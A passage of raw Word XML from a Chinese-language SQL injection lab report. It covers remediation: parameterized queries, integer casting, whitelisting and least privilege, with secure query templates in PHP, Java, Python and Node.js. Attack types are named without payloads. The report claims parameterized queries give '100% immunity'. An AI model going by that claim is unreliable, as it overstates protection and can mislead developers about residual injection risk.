            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>$sql = "SELECT * FROM users WHERE id = :id LIMIT 0,1";</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>$stmt = $pdo-&gt;prepare($sql);</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>$stmt-&gt;execute([':id' =&gt; $_GET['id']]);</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0CEF03C8">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="50" w:name="heading_50"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>9.2 场景适配方案：强制类型转换</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50"/>
    </w:p>
    <w:p w14:paraId="12ECB50D">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>针对数字型参数注入场景，通过强制类型转换过滤恶意字符，仅保留纯数字参数，彻底杜绝字符串注入Payload。适用于ID、页码、排序数字等纯数字参数场景。</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45503B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CD6B10A">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$id = (int)$_GET['id']; // 强制转为整型，恶意字符串自动丢弃</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="49F61F60">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="heading_51"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>9.3 兜底防护方案：输入白名单校验</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p w14:paraId="0828EF51">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>针对无法使用参数化查询的场景（如ORDER BY排序字段、表名查询），采用白名单机制，仅允许预设合法参数值，拒绝所有未知输入，杜绝恶意参数注入。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681252DE">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="heading_52"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>9.4 纵深防御补充策略</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>
    </w:p>
    <w:p w14:paraId="4AFFD54B">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. 数据库最小权限原则：业务数据库账号仅授予查询、写入必要权限，禁止root、管理员高权限；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. 关闭数据库错误回显：禁止前端展示SQL报错信息，防止泄露数据库结构；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. 全局输入过滤：统一拦截SQL特殊字符，作为辅助防护手段。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AAD6C0">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="53" w:name="heading_53"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>10 修复效果对比验证</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
    </w:p>
    <w:p w14:paraId="1D326F4B">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>通过漏洞版与修复版代码对照测试，验证防护方案的有效性与业务兼容性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3326F3FC">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="heading_54"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>10.1 业务功能兼容性验证</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
    </w:p>
    <w:p w14:paraId="189490DA">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>修复后所有正常业务功能完全正常，用户查询、登录、注册、搜索功能无异常，不影响原有业务逻辑。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7090DC07">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="heading_55"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>10.2 注入攻击防护效果验证</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>
    </w:p>
    <w:p w14:paraId="119C7FF8">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>对所有高危Payload进行复测，修复后的参数化查询代码可完全防御：单引号报错注入、OR永真注入、UNION拖库注入、登录万能密码注入等所有攻击场景，恶意输入仅被当作普通字符串处理，无法篡改SQL语义。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D604C3C">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="56" w:name="heading_56"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>10.3 对比结论</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p w14:paraId="539D3529">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>参数化查询修复方案实现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>100%免疫SQL注入漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，同时保证业务功能完整性，是安全、高效、合规的最优修复方案。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3561E53C">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="heading_57"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>11 多语言标准化修复代码示例</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>
    </w:p>
    <w:p w14:paraId="674D436E">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>覆盖PHP、Java、Python、Node.js、C#主流开发语言，提供可直接落地的安全编码模板。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBA259C">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="heading_58"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>11.1 PHP MySQLi 安全写法</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/>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023D1B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7BD21FD1">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$stmt = mysqli_prepare($conn, "SELECT * FROM users WHERE id = ? LIMIT 0,1");</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>mysqli_stmt_bind_param($stmt, "i", $id);</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>mysqli_stmt_execute($stmt);</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="53E416BE">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="59" w:name="heading_59"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>11.2 Java JDBC 安全写法</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>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3C2F4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59B8B98">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String sql = "SELECT * FROM users WHERE id = ?";</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>PreparedStatement pstmt = conn.prepareStatement(sql);</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>pstmt.setInt(1, userId);</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>ResultSet rs = pstmt.executeQuery();</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5F402431">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="heading_60"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>11.3 Java MyBatis 安全写法</w:t>
      </w:r>
      <w:bookmarkEnd w:id="60"/>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5FC898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17865271">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&lt;!-- 安全：参数化查询 --&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>&lt;select id="selectUser" resultType="User"&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">    SELECT * FROM sys_user WHERE user_id = #{userId}</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>&lt;/select&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3767F7AD">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="61" w:name="heading_61"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>11.4 Python SQLAlchemy 安全写法</w:t>
      </w:r>
      <w:bookmarkEnd w:id="61"/>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3C0216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4B3F076">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from sqlalchemy import text</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>result = db.session.execute(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">    text("SELECT * FROM users WHERE id = :id"),</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">    {"id": user_id}</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>).fetchone()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6146E060">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="heading_62"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>11.5 Node.js mysql2 安全写法</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>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8CE13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4F55C254">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const [rows] = await connection.execute(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">    'SELECT * FROM users WHERE id = ?',</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">    [userId]</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1F64DDD3">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="heading_63"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>12 实验结论与安全总结</w:t>
      </w:r>
      <w:bookmarkEnd w:id="63"/>
    </w:p>
    <w:p w14:paraId="3615975D">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="64" w:name="heading_64"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
